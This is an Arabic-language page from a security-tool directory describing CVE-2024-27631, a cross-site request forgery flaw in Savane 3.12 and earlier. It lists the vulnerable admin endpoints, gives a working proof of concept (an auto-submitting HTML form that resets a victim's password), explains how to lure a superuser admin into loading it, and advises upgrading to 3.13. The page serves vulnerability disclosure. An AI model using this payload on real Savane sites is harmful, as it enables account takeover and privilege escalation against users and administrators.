Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-27631 — CVE-2024–27631 مرجع | Kitploit
أدوات/GitHubGitHub/ally-petitt/cve-2024-27631
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubally-petitt/cve-2024-27631

CVE-2024-27631

CVE-2024–27631 مرجع

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تفاصيل الثغرة الأمنية CVE-2024-27631

نظرة عامة

في Savane الإصدار 3.12 والإصدارات السابقة، يؤدي الافتقار إلى حماية CSRF على الوظائف الإدارية إلى إمكانية تصعيد الامتيازات و/أو الاستيلاء على الحسابات. على وجه الخصوص، تتضمن نقطة النهاية /siteadmin/usergroup.php وظيفة تغيير كلمات المرور والأعلام الإدارية للمستخدمين الآخرين، مما يسمح للمهاجم بجعل نفسه مسؤولاً بفعالية.

تشمل نقاط النهاية البارزة الأخرى المعرضة لـ CSRF ما يلي:

  • /support/admin/userperms.php - تغيير صلاحيات من يمكنه النشر في أداة التتبع.
  • /project/admin/conf-copy.php - استبدال التكوين الحالي لمجموعة بنسخة من مجموعة أخرى.
  • /project/admin/editgroupnotifications.php - تعديل إشعارات المجموعة. يمكن إرسال العناصر الخاصة إلى القوائم البريدية العامة.
  • /project/admin/useradmin.php - حذف المستخدمين من مجموعة.
  • /news/admin/index.php - تعديل عنوان البريد الإلكتروني لأداة تتبع الأخبار.
  • /people/editjob.php - إضافة وظيفة لمجموعة.

تصنيف CWE: CWE-352: تزوير الطلب عبر المواقع (CSRF)

تم الإبلاغ بواسطة: Ally Petitt

المنتج المتأثر: Savane

الإصدارات المتأثرة: 3.12 والإصدارات السابقة

خطوات التحقق

هذا إثبات مفهوم (PoC) لتغيير كلمة مرور حساب مستخدم آخر كطريق للاستيلاء على الحساب.

  1. اختر مستخدمًا ضحية سيتم تغيير كلمة مروره.
  2. لاحظ معرف المستخدم الخاص به من صفحة ملفه الشخصي (/users/<username>).
  3. أنشئ صفحة الويب الخبيثة التالية، مع استبدال user_id بمعرف المستخدم الضحية و<savane_instance> باسم النطاق/عنوان المضيف الصحيح.
root@kitploit:~
<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">

    <input name="form_pw" type="hidden" value="Password1!" />
    <input name="form_pw2" type="hidden" value="Password1!" />
    <input name="user_id" type="hidden" value="<user_id>" />
    <input name="update" type="hidden" value="Update" />
    <input type="submit" value="Submit Request" />
</form>

<script>
document.getElementById("autosubmit").submit();
</script>

  1. استضف صفحة HTML الخبيثة على خادم ويب وأرسل الرابط إلى مسؤول (يجب أن يكون في وضع المستخدم الفائق لكي يعمل هذا).
  2. بعد أن ينقر على الرابط، قم بتسجيل الدخول إلى حساب الضحية باستخدام كلمة المرور الآمنة جدًا Password1!.

لاحظ أن سكريبت إثبات المفهوم هذا تم اختباره على Firefox v103.0 (64-bit).

التخفيف

قم بالترقية إلى إصدار Savane 3.13 أو أعلى. يمكن العثور على التصحيح هنا.

تنزيل الأداة